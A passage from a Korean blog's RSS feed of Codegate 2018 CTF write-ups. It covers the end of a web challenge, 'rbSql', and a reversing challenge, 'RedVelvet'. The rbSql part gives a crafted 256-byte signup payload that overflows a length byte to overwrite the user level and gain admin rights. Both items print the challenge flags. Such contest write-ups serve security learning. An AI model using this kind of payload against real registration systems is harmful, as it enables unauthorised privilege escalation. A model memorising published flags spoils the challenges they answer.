class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;email too long&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;join_chk in index.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;여기서 살펴볼 부분이 umail 파라미터에 대한 길이 제한입니다. hex value의 경우 값의 범위는 0x00~0xff까지입니다. 만약 0xff를 넘어가는 값이 올 경우 overflow로 인해 0x00이 되겠죠. umail의 길이제한을 다시 살펴보면 256바이트까지 입력을 받을 수 있도록 허용해두었습니다. 따라서 rbPack의 포맷을 맞춰 데이터를 삽입하고 256바이트까지 데이터를 입력해 umail의 길이를 00으로 바꾼다면 lvl의 값을 수정할 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px; text-align: center;; height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9912A1405C6774CA07&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9912A1405C6774CA07&quot; width=&quot;900&quot; height=&quot;383&quot; filename=&quot;4.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;text-align: center;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;회원가입 시 fiddler를 이용하여 값을 변조하였습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 762px; text-align: center;; height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/994050405C6774CB06&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F994050405C6774CB06&quot; width=&quot;762&quot; height=&quot;230&quot; filename=&quot;5.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;text-align: center;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;umail 파라미터에 삽입한 페이로드는 다음과 같습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;%01%20c4ca4238a0b923820dcc509a6f75849b%01%00%01%012AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;umail 이전의 패킹된 데이터는 0x01,0x00이기 때문에 0x01,0x20,md5 hash값을 넣어주면서 upw를 맞춰주었고, 0x01,0x00은 uip, 0x01,0x01,2는 lvl 부분입니다. 나머지는 256바이트를 맞춰주기 위한 더미 데이터입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px; text-align: center;; height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/996811405C6774CB3F&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F996811405C6774CB3F&quot; width=&quot;900&quot; height=&quot;543&quot; filename=&quot;6.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;text-align: center;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;현재 페이지는 대회중 구축한 테스트페이지에 적용한 상태이며, 글을 쓰는 현재는 대회가 종료된 시점이기 때문에 실서버에 대한 캡처는 하지 못했습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;아무튼 위와 같은 페이로드로 admin의 권한을 획득할 수 있었으며, 플래그를 얻어냈습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;FLAG :&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;FLAG{akaneTsunemoriIsSoCuteDontYouThinkSo?}&lt;/strong&gt;&lt;/p&gt;</description>
      <category>CTF/CodeGate 2018 Qualifier</category>
      <category>CODEGATE</category>
      <category>codegate 2018</category>
      <category>rbsql</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/246</guid>
      <comments>https://choiys.tistory.com/entry/Codegate-2018-Qualifier-Web-%E2%80%93-rbSql#entry246comment</comments>
      <pubDate>Sat, 16 Feb 2019 11:28:02 +0900</pubDate>
    </item>
    <item>
      <title>[Codegate 2018 Qualifier] Rev &amp;ndash; RedVelvet</title>
      <link>https://choiys.tistory.com/entry/Rev-%E2%80%93-RedVelvet</link>
      <description>&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;[Codegate 2018] Rev – RedVelvet&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 620px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99A95C395C6773CB09&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99A95C395C6773CB09&quot; width=&quot;620&quot; height=&quot;264&quot; filename=&quot;1.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;Happiness! 뮤비 한번 보고 갑시다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;iframe src=&quot;https://www.youtube.com/embed/JFgv8bKfxEs&quot; width=&quot;560&quot; height=&quot;315&quot; allow=&quot;autoplay; encrypted-media&quot; frameborder=&quot;&quot; allowfullscreen=&quot;true&quot;&gt;&lt;/iframe&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;파일을 다운로드 후 압축을 풀면 RedVelvet이라는 파일이 하나 나타납니다. 이는 64bit ELF 파일입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99A9B8395C6773CB09&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99A9B8395C6773CB09&quot; width=&quot;900&quot; height=&quot;64&quot; filename=&quot;2.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;먼저 실행시켜봅시다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 296px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99E428395C6773CB08&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99E428395C6773CB08&quot; width=&quot;296&quot; height=&quot;33&quot; filename=&quot;3.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;Your flag : 라는 문자열이 나타나고, 입력을 기다립니다. 아무 문자열이나 입력해주면 실행이 그냥 종료되는데, 특정한 조건을 맞춰 입력하지 않으면 exit()을 실행하여 프로그램을 종료시키는 형태인 것 같습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 658px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99A95A395C6773CC09&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99A95A395C6773CC09&quot; width=&quot;658&quot; height=&quot;101&quot; filename=&quot;4.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;IDA에 올린 후 String view를 이용해 살펴보면 위와 같이 flag를 출력하는 부분임을 암시하는 문자열이 존재합니다. 이를 따라가보면 main함수를 확인할 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 499px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99E58A395C6773CC08&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99E58A395C6773CC08&quot; width=&quot;499&quot; height=&quot;674&quot; filename=&quot;5.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;메인함수 내에는 위와 같은 형태로 프로세스를 진행하는데, func1~func15가 메인 프로세스이며, 마지막 비교 구문을 통해 플래그를 출력해줍니다. func1~func15를 살펴보면 이전 함수의 두번째 파라미터가 다음 함수의 첫번째 파라미터로 들어가는 것으로 보아 한글자 한글자씩 비교하는 형태로 보이며, 이를 모두 만족했을 경우 도출되는 문자열을 SHA256 알고리즘으로 해시 후 s2~v47에 해당하는 해시값과 동일할 경우 플래그임을 알려줍니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;딱 봐도 angr를 이용하면 슥삭 할 수 있을 것 같은 문제지만, 저는 리알못이기 때문에 angr 대신 z3를 이용해 한글자 한글자 맞춰보는 삽질을 했습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 576px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/991A09395C6773CC07&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F991A09395C6773CC07&quot; width=&quot;576&quot; height=&quot;741&quot; filename=&quot;6.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;gdb를 이용해 main함수를 살펴보면 func1 함수의 인자로 esi, edi를 넘겨줍니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;main+257의 위치에 breakpoint를 걸고 해당 값을 확인해봅시다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 412px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99AAD0395C6773CD09&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99AAD0395C6773CD09&quot; width=&quot;412&quot; height=&quot;194&quot; filename=&quot;7.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;예상대로 1234를 입력했을 경우 1, 2를 순서대로 파라미터로 받는 것을 알 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 367px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9985E8395C6773CD0A&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9985E8395C6773CD0A&quot; width=&quot;367&quot; height=&quot;107&quot; filename=&quot;8.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이제 IDA로 돌아와서 함수들의 조건을 맞춰 HAPPINESS:)를 출력할 수 있도록 조건을 확인해봅시다. 앞서 말했던대로, 저는 z3를 이용하여 한글자 한글자 추려냈습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 645px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99AF75395C6773CD09&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99AF75395C6773CD09&quot; width=&quot;645&quot; height=&quot;549&quot; filename=&quot;9.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;한글자 한글자 삽질하며 찾아가다 보면&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;What_You&lt;/strong&gt;&amp;nbsp;와 같이 문장으로 예상되는 단어가 나타납니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 565px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9959F4365C6773CE06&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9959F4365C6773CE06&quot; width=&quot;565&quot; height=&quot;360&quot; filename=&quot;10.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;???????&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;Be?&lt;/strong&gt;&amp;nbsp;이후 나머지 함수들의 결과를 찾아가다 보면 아래와 같은 플래그를 찾아낼 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 378px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99697F365C6773CE01&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99697F365C6773CE01&quot; width=&quot;378&quot; height=&quot;307&quot; filename=&quot;11.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;FLAG :&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;What_You_Wanna_Be?:)_la_la&lt;/strong&gt;&lt;/p&gt;</description>
      <category>CTF/CodeGate 2018 Qualifier</category>
      <category>CODEGATE</category>
      <category>codegate 2018</category>
      <category>RedVelvet</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/245</guid>
      <comments>https://choiys.tistory.com/entry/Rev-%E2%80%93-RedVelvet#entry245comment</comments>
      <pubDate>Sat, 16 Feb 2019 11:24:24 +0900</pubDate>
    </item>
    <item>
      <title>[Codegate 2018 Qualifier] Misc &amp;ndash; Impel Down</title>
      <link>https://choiys.tistory.com/entry/Misc-%E2%80%93-Impel-Down</link>
